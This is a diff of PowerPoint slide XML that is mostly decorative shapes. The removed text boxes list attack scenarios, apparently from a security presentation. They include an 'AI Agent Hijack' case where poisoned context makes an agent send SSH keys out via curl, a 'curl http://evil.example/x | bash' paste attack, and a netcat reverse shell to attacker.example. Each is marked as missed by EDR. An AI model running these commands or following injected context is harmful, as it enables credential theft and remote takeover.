+              <a:prstDash val="sysDot"/>
+              <a:round/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:lnRef>
+            <a:fillRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="tx1"/>
+            </a:fontRef>
+          </p:style>
+        </p:cxnSp>
+        <p:cxnSp>
+          <p:nvCxnSpPr>
+            <p:cNvPr id="29" name="Straight Connector 28">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C53ED46F-B155-4F61-89A2-9811AA0F3B4E}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvCxnSpPr>
+              <a:cxnSpLocks/>
+            </p:cNvCxnSpPr>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvCxnSpPr>
+          <p:spPr>
+            <a:xfrm>
+              <a:off x="7029447" y="3697727"/>
+              <a:ext cx="1285875" cy="0"/>
+            </a:xfrm>
+            <a:prstGeom prst="line">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:ln w="31750" cap="rnd" cmpd="sng">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
+              <a:prstDash val="sysDot"/>
+              <a:round/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:lnRef>
+            <a:fillRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="tx1"/>
+            </a:fontRef>
+          </p:style>
+        </p:cxnSp>
+        <p:cxnSp>
+          <p:nvCxnSpPr>
+            <p:cNvPr id="30" name="Straight Connector 29">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083B7973-20C3-4DB8-B3E0-064793F7A9AC}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvCxnSpPr>
+              <a:cxnSpLocks/>
+            </p:cNvCxnSpPr>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvCxnSpPr>
+          <p:spPr>
+            <a:xfrm>
+              <a:off x="7029447" y="3880729"/>
+              <a:ext cx="1285875" cy="0"/>
+            </a:xfrm>
+            <a:prstGeom prst="line">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:ln w="31750" cap="rnd" cmpd="sng">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
+              <a:prstDash val="sysDot"/>
+              <a:round/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:lnRef>
+            <a:fillRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="tx1"/>
+            </a:fontRef>
+          </p:style>
+        </p:cxnSp>
+        <p:cxnSp>
+          <p:nvCxnSpPr>
+            <p:cNvPr id="31" name="Straight Connector 30">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF30D744-3746-48BB-92A0-20B891DE8683}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvCxnSpPr>
+              <a:cxnSpLocks/>
+            </p:cNvCxnSpPr>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvCxnSpPr>
+          <p:spPr>
+            <a:xfrm>
+              <a:off x="7029447" y="4063732"/>
+              <a:ext cx="1285875" cy="0"/>
+            </a:xfrm>
+            <a:prstGeom prst="line">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:ln w="31750" cap="rnd" cmpd="sng">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="40000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
+              <a:prstDash val="sysDot"/>
+              <a:round/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:lnRef>
+            <a:fillRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="tx1"/>
+            </a:fontRef>
+          </p:style>
+        </p:cxnSp>
+      </p:grpSp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="14" name="Picture 13">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80519A3F-75D8-6593-D6FC-6DBD233424B6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1188720"/>
-            <a:ext cx="3200400" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF6B35"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>AI Agent Hijack</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="TextBox 4"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="1481328"/>
-            <a:ext cx="6858000" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>Poisoned context exfils SSH keys: curl ...steal @/root/.ssh/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr dirty="0" err="1"/>
-              <a:t>id_rsa</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="6" name="TextBox 5"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6858000" y="1188720"/>
-            <a:ext cx="2011680" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="900" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>sudoers: ✅  EDR: missed</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="7" name="TextBox 6"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="2194560"/>
-            <a:ext cx="3200400" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF6B35"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>Clipboard Paste Attack</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="8" name="TextBox 7"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="2487168"/>
-            <a:ext cx="6858000" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>Compromised forum command: curl http://</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr dirty="0" err="1"/>
-              <a:t>evil.example</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>/x | bash</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="9" name="TextBox 8"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6858000" y="2194560"/>
-            <a:ext cx="2011680" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="900" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>sudoers: ✅  EDR: missed</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="3200400"/>
-            <a:ext cx="3200400" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1400" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF6B35"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>Session Takeover</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="11" name="TextBox 10"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="548640" y="3493008"/>
-            <a:ext cx="6858000" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="1100" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>Reverse shell burst: nc -e /bin/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr dirty="0" err="1"/>
-              <a:t>sh</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr dirty="0" err="1"/>
-              <a:t>attacker.example</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t> 4444</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="12" name="TextBox 11"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="6858000" y="3200400"/>
-            <a:ext cx="2011680" cy="274320"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:defRPr sz="900" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF4444"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>sudoers: ✅  EDR: missed</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:srcRect r="3467" b="2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="-2286" y="4472"/>
+            <a:ext cx="9146286" cy="4992830"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+      <p:grpSp>
+        <p:nvGrpSpPr>
+          <p:cNvPr id="33" name="Group 32">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D85FE18-7BE5-446D-9A33-1C7C3B910680}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvGrpSpPr>
+            <a:grpSpLocks noGrp="1" noUngrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1"/>
+          </p:cNvGrpSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvGrpSpPr>
+        <p:grpSpPr>
+          <a:xfrm>
+            <a:off x="0" y="1556565"/>
+            <a:ext cx="9036544" cy="3069979"/>
+            <a:chOff x="1" y="2075420"/>
+            <a:chExt cx="12048729" cy="4093306"/>
+          </a:xfrm>
+        </p:grpSpPr>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="34" name="Oval 33">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0051917B-A90B-4216-B86A-326AF85FF7EE}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr>
+            <a:xfrm rot="4500000">
+              <a:off x="7942191" y="2507571"/>
+              <a:ext cx="3563871" cy="3563871"/>
+            </a:xfrm>
+            <a:prstGeom prst="ellipse">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:noFill/>
+            <a:ln w="31750">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="10000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="20000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
+              <a:prstDash val="sysDot"/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="2">
+              <a:schemeClr val="accent1">
+                <a:shade val="50000"/>
+              </a:schemeClr>
+            </a:lnRef>
+            <a:fillRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="lt1"/>
+            </a:fontRef>
+          </p:style>
+          <p:txBody>
+            <a:bodyPr rtlCol="0" anchor="ctr"/>
+            <a:lstStyle/>
+            <a:p>
+              <a:pPr algn="ctr"/>
+              <a:endParaRPr lang="en-US"/>
+            </a:p>
+          </p:txBody>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="35" name="Oval 34">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{619777D6-E475-4DB7-968D-5643F54B082D}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr>
+            <a:xfrm rot="16200000">
+              <a:off x="10435065" y="4048931"/>
+              <a:ext cx="1381607" cy="1381607"/>
+            </a:xfrm>
+            <a:prstGeom prst="ellipse">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:noFill/>
+            <a:ln w="31750">
+              <a:gradFill>
+                <a:gsLst>
+                  <a:gs pos="0">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="60000"/>
+                      <a:lumOff val="40000"/>
+                      <a:alpha val="20000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                  <a:gs pos="100000">
+                    <a:schemeClr val="tx2">
+                      <a:lumMod val="50000"/>
+                      <a:alpha val="20000"/>
+                    </a:schemeClr>
+                  </a:gs>
+                </a:gsLst>
+                <a:lin ang="5400000" scaled="1"/>
+              </a:gradFill>
+              <a:prstDash val="sysDot"/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="2">
+              <a:schemeClr val="accent1">
+                <a:shade val="50000"/>
+              </a:schemeClr>
+            </a:lnRef>
+            <a:fillRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="lt1"/>
+            </a:fontRef>
+          </p:style>
+          <p:txBody>
+            <a:bodyPr rtlCol="0" anchor="ctr"/>
+            <a:lstStyle/>
+            <a:p>
+              <a:pPr algn="ctr"/>
+              <a:endParaRPr lang="en-US"/>
+            </a:p>
+          </p:txBody>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="36" name="Oval 35">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8750EF92-D35C-417F-B5C0-4BA7EA36A683}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr>
+            <a:xfrm rot="16200000">
+              <a:off x="1" y="2075420"/>
+              <a:ext cx="3144364" cy="3144364"/>
+            </a:xfrm>
+            <a:prstGeom prst="ellipse">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:gradFill>
+              <a:gsLst>
+                <a:gs pos="0">
+                  <a:schemeClr val="tx2">
+                    <a:lumMod val="75000"/>
+                    <a:alpha val="20000"/>
+                  </a:schemeClr>
+                </a:gs>
+                <a:gs pos="100000">
+                  <a:schemeClr val="tx2">
+                    <a:lumMod val="50000"/>
+                    <a:alpha val="10000"/>
+                  </a:schemeClr>
+                </a:gs>
+              </a:gsLst>
+              <a:lin ang="5400000" scaled="1"/>
+            </a:gradFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="2">
+              <a:schemeClr val="accent1">
+                <a:shade val="50000"/>
+              </a:schemeClr>
+            </a:lnRef>
+            <a:fillRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="lt1"/>
+            </a:fontRef>
+          </p:style>
+          <p:txBody>
+            <a:bodyPr rtlCol="0" anchor="ctr"/>
+            <a:lstStyle/>
+            <a:p>
+              <a:pPr algn="ctr"/>
+              <a:endParaRPr lang="en-US"/>
+            </a:p>
+          </p:txBody>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="37" name="Oval 36">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BB14A7B-EFDD-4C96-8E2A-7DF6B1618A7E}"/>
+                </a:ext>
+                <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                  <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+                </a:ext>
+              </a:extLst>
+            </p:cNvPr>
+            <p:cNvSpPr/>
+            <p:nvPr>
+              <p:extLst>
+                <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                  <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+                </p:ext>
+              </p:extLst>
+            </p:nvPr>
+          </p:nvSpPr>
+          <p:spPr>
+            <a:xfrm rot="12600000">
+              <a:off x="10150845" y="4270841"/>
+              <a:ext cx="1897885" cy="1897885"/>
+            </a:xfrm>
+            <a:prstGeom prst="ellipse">
+              <a:avLst/>
+            </a:prstGeom>
+            <a:gradFill>
+              <a:gsLst>
+                <a:gs pos="0">
+                  <a:schemeClr val="tx2">
+                    <a:lumMod val="75000"/>
+                    <a:alpha val="10000"/>
+                  </a:schemeClr>
+                </a:gs>
+                <a:gs pos="100000">
+                  <a:schemeClr val="tx2">
+                    <a:lumMod val="75000"/>
+                    <a:alpha val="20000"/>
+                  </a:schemeClr>
+                </a:gs>
+              </a:gsLst>
+              <a:lin ang="5400000" scaled="1"/>
+            </a:gradFill>
+            <a:ln>
+              <a:noFill/>
+            </a:ln>
+          </p:spPr>
+          <p:style>
+            <a:lnRef idx="2">
+              <a:schemeClr val="accent1">
+                <a:shade val="50000"/>
+              </a:schemeClr>
+            </a:lnRef>
+            <a:fillRef idx="1">
+              <a:schemeClr val="accent1"/>
+            </a:fillRef>
+            <a:effectRef idx="0">
+              <a:schemeClr val="accent1"/>
+            </a:effectRef>
+            <a:fontRef idx="minor">
+              <a:schemeClr val="lt1"/>
+            </a:fontRef>
+          </p:style>
+          <p:txBody>
+            <a:bodyPr rtlCol="0" anchor="ctr"/>
+            <a:lstStyle/>
+            <a:p>
+              <a:pPr algn="ctr"/>
+              <a:endParaRPr lang="en-US" dirty="0"/>
+            </a:p>
+          </p:txBody>
+        </p:sp>
+        <p:sp>
+          <p:nvSpPr>
+            <p:cNvPr id="38" name="Oval 37">
+              <a:extLst>
+                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
